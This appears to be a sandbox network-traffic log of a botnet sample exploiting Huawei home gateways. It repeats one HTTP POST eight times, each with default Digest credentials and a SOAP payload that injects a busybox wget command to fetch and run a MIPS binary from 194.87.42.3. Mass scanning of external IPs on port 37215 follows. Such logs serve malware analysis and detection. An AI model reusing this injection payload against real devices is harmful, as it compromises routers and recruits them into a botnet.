Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>

Source: global traffic	TCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
Source: global traffic	TCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
Source: global traffic	TCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443

Source: global traffic	TCP traffic: 192.168.2.23:34248 -> 194.87.42.3:5555
Source: global traffic	TCP traffic: 192.168.2.23:39970 -> 197.121.109.140:37215
Source: global traffic	TCP traffic: 192.168.2.23:39970 -> 156.13.27.131:37215
Source: global traffic	TCP traffic: 192.168.2.23:39970 -> 197.107.155.163:37215
Source: global traffic	TCP traffic: 192.168.2.23:39970 -> 197.0.242.140:37215
Source: global traffic	TCP traffic: 192.168.2.23:39970 -> 197.150.212.26:37215
Source: global traffic	TCP traffic: 192.168.2.23:39970 -> 41.100.55.29:37215
Source: global traffic	TCP traffic: 192.168.2.23:39970 -> 156.237.83.113:37215
Source: global traffic	TCP traffic: 192.168.2.23:39970 -> 197.177.40.2:37215
Source: global traffic	TCP traffic: 192.168.2.23:39970 -> 41.226.211.89:37215
Source: global traffic	TCP traffic: 192.168.2.23:39970 -> 156.149.224.251:37215
Source: global traffic	TCP traffic: 192.168.2.23:39970 -> 41.112.9.164:37215
Source: global traffic	TCP traffic: 192.168.2.23:39970 -> 197.105.174.65:37215
Source: global traffic	TCP traffic: 192.168.2.23:39970 -> 197.0.97.149:37215
Source: global traffic	TCP traffic: 192.168.2.23:39970 -> 197.169.186.14:37215
Source: global traffic	TCP traffic: 192.168.2.23:39970 -> 41.229.125.240:37215
Source: global traffic	TCP traffic: 192.168.2.23:39970 -> 197.68.0.51:37215
Source: global traffic	TCP traffic: 192.168.2.23:39970 -> 156.236.11.105:37215
Source: global traffic	TCP traffic: 192.168.2.23:39970 -> 156.9.32.244:37215
Source: global traffic	TCP traffic: 192.168.2.23:39970 -> 197.110.178.253:37215
Source: global traffic	TCP traffic: 192.168.2.23:39970 -> 197.102.69.106:37215
Source: global traffic	TCP traffic: 192.168.2.23:39970 -> 156.84.136.102:37215
Source: global traffic	TCP traffic: 192.168.2.23:39970 -> 41.249.26.121:37215
Source: global traffic	TCP traffic: 192.168.2.23:39970 -> 197.190.162.18:37215
Source: global traffic	TCP traffic: 192.168.2.23:39970 -> 197.68.145.145:37215
Source: global traffic	TCP traffic: 192.168.2.23:39970 -> 41.186.45.21:37215
Source: global traffic	TCP traffic: 192.168.2.23:39970 -> 41.60.103.22:37215
Source: global traffic	TCP traffic: 192.168.2.23:39970 -> 41.22.93.0:37215
Source: global traffic	TCP traffic: 192.168.2.23:39970 -> 197.16.128.101:37215
Source: global traffic	TCP traffic: 192.168.2.23:39970 -> 197.134.181.254:37215
Source: global traffic	TCP traffic: 192.168.2.23:39970 -> 156.81.101.107:37215
Source: global traffic	TCP traffic: 192.168.2.23:39970 -> 197.219.254.2:37215
Source: global traffic	TCP traffic: 192.168.2.23:39970 -> 156.68.63.179:37215
Source: global traffic	TCP traffic: 192.168.2.23:39970 -> 41.41.148.208:37215
Source: global traffic	TCP traffic: 192.168.2.23:39970 -> 156.78.244.206:37215
Source: global traffic	TCP traffic: 192.168.2.23:39970 -> 41.187.71.70:37215
Source: global traffic	TCP traffic: 192.168.2.23:39970 -> 156.99.47.57:37215
Source: global traffic	TCP traffic: 192.168.2.23:39970 -> 156.141.245.154:37215
Source: global traffic	TCP traffic: 192.168.2.23:39970 -> 156.46.89.64:37215
Source: global traffic	TCP traffic: 192.168.2.23:39970 -> 41.117.52.46:37215
Source: global traffic	TCP traffic: 192.168.2.23:39970 -> 197.5.96.127:37215
Source: global traffic	TCP traffic: 192.168.2.23:39970 -> 156.159.163.6:37215
